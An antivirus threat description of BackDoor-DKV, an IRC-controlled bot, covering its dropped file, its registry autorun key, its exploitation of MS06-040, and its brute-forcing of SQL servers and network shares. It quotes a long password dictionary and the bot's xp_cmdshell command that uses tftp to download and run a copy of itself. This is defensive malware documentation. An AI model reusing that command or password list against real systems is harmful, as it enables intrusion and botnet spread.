BackDoor-DKV

--- Updated February 9th, 2007:
BackDoor-DKV has been deemed Low-Profiled due to media attention at http://www.taipeitimes.com/News/taiwan/archives/2007/02/09/2003348274
--

This is an IRC controlled backdoor, which provides an attacker with unauthorized remote access to the compromised  machine and the attacker can perform the following actions on this infected machine:

• Retrieve system information
• Connect to download files from the URLs.
• Execute programs remotely
• Start and stop services
• Perform DDOS
• Uninstall the bot

The characteristics of this BackDoor with regards to the file names, port number used, etc will differ, depending on the way in which the attacker had configured it. Hence, this is a general description.

When the BackDoor is executed, it drops the following file:

• %SysDir%\dydhcp.exe (A copy of itself)

In an attempt to make the dropped files harder to find, the files may have their attributes changed to hidden and system.

Note: %SysDir% is a variable location and refers to the Windows System directory.

The following mutex is created so that it will be in memory only once:

• DBWinMutex

The following registry entry is modified so the BackDoor can run at system startup:

• Hkey_Local_Machine\Software\Microsoft\Windows\
  CurrentVersion\Run Dynamic DHCP = "%System%\dydhcp.exe"

Once running, the BackDoor component connects to a predefined IRC server on port 4783 and joins a predefined channel by issuing the JOIN command.

At the time of writing this VIL, the author had set the Topic for the channel as a URL for an malicious executable. This in turn is interpreted as a command by the BackDoor and is downloaded and executed on the victim's machine.

The files downloaded from this URL is detected as W32/SpotFace.worm.

As this threat is a trojan rather than a virus, it does not spread by itself but can be instructed to spread by a malicious user or by commands in the IRC channel name.

This BackDoor trojan can be instructed to scan for vulnerable machines on the network, and uses the following Microsoft vulnerabilities to spread.

• Microsoft Windows Server Service Buffer Overflow (MS06-040)
• Weak password exploitation of SQL servers

It can scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

• administrator
• administrador
• administrateur
• administrat
• admins
• admin
• adm
• password1
• password
• passwd
• pass1234
• pass
• pwd
• 0071
• 12
• 123
• 1234
• 12345
• 123456
• 1234567
• 12345678
• 123456789
• 1234567890
• 2000
• 2001
• 2002
• 2003
• 2004
• test
• guest
• none
• demo
• unix
• linux
• changeme
• default
• system
• server
• root
• null
• qwerty
• mail
• outlook
• web
• www
• internet
• accounts
• accounting
• home
• homeuser
• user
• oem
• oemuser
• oeminstall
• windows
• win98
• win2k
• winxp
• winnt
• win2000
• qaz
• asd
• zxc
• qwe
• bob
• jen
• joe
• fred
• bill
• mike
• john
• peter
• luke
• sam
• sue
• susan
• peter
• brian
• lee
• neil
• ian
• chris
• eric
• george
• kate
• bob
• katie
• mary
• login
• loginpass
• technical
• backup
• exchange
• f***
• b****
• sl**
• sex
• god
• hell
• hello
• domain
• domainpass
• domainpassword
• database
• access
• dbpass
• dbpassword
• databasepass
• data
• databasepassword
• db1
• db2
• db1234
• sa
• sql
• sqlpassoainstall
• orainstall
• oracle
• ibm
• cisco
• dell
• compaq
• siemens
• hp
• nokia
• xp
• control
• office
• blank
• winpass
• main
• lan
• internet
• intranet
• student
• teacher
• staff

(Note, asterisks above replace content)

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

• Weak password exploitation of network shares

The trojan be instructed to send itself by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.